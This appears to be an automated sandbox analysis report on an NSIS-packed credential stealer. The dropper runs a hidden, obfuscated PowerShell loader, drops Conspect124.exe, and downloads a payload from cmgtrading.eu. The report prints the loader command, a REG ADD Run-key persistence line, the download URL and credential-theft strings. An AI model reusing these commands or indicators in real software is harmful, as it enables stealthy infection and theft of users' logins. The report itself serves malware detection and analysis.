Source: global traffic | HTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: cmgtrading.eu | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 107.173.4.16 (this entry is repeated 50 times in the report: every connection to 107.173.4.16 is made without a preceding DNS lookup)
Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | equals www.ebuddy.com (eBuggy)
Source: Conspect124.exe | String found in binary or memory: http://www.ebuddy.com | equals www.ebuddy.com (eBuggy)
Source: Conspect124.exe | String found in binary or memory: http://www.facebook.com/ | equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: cmgtrading.eu
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: Conspect124.exe, 00000007.00000002.4176574564.0000000022B70000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cmgtrading.eu/eODGqfP132.bin
Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189601872.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3182004539.0000000006F8B000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189748673.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp.
Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp5
Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpd
Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gplH
Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpy
Source: SDWLLRJcsY.exe, 00000000.00000000.1682153020.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SDWLLRJcsY.exe, 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Conspect124.exe, 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Conspect124.exe | String found in binary or memory: http://www.ebuddy.com
Source: Conspect124.exe | String found in binary or memory: http://www.imvu.com
Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: Conspect124.exe | String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cmgtrading.eu/eODGqfP132.bin
Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cmgtrading.eu/eODGqfP132.binC
Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Conspect124.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Conspect124.exe | String found in binary or memory: https://www.google.com
Source: Conspect124.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown | Network traffic detected: HTTP traffic on port 64859 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64859
Source: unknown | HTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.4:64859 version: TLS 1.2
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_004053EF
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 11_2_0040987A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 11_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5

E-Banking Fraud

Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Conspect124.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00401806 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004016FD NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004017B7 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00402CAC NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00402D66 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | File created: C:\Windows\brandbombernes.lnk
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_00406956
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_00404C2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DAEAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DAF3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02DAE798
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_00406956
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_00404C2C
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BD7194
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BCB5C1
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044B040
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0043610D
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00447310
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044A490
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040755A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0043C560
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044B610
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044D6C0
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004476F0
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044B870
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044081D
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00414957
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004079EE
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00407AEB
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044AA80
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00412AA9
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00404B74
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0044BBD8
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00404BE5
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00404C76
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00415CFE
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00416D72
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00446D30
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00446D8B
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00406E8F
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00405038
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0041208C
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004050A9
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0040511A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0043C13A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004051AB
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00449300
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0040D322
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0044A4F0
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0043A5AB
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00413631
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00446690
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0044A730
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004398D8
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004498E0
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0044A886
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0043DA09
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00438D5E
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00449ED0
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_0041FE83
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00430F54
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004050C2
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004014AB
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00405133
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004051A4
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00401246
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_0040CA46
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00405235
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004032C8
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_004222D9
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00401689
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00402F60
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: String function: 00416760 appears 69 times
Source: SDWLLRJcsY.exe | Static PE information: invalid certificate
Source: SDWLLRJcsY.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@17/15@2/3
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_004020FE CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | File created: C:\Users\user\AppData\Roaming\intercessionate
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | File created: C:\Users\user\AppData\Local\Temp\nsd4F13.tmp
Source: SDWLLRJcsY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Conspect124.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Conspect124.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Conspect124.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Conspect124.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Conspect124.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Conspect124.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SDWLLRJcsY.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | File read: C:\Users\user\Desktop\SDWLLRJcsY.exe
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Users\user\Desktop\SDWLLRJcsY.exe "C:\Users\user\Desktop\SDWLLRJcsY.exe"
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
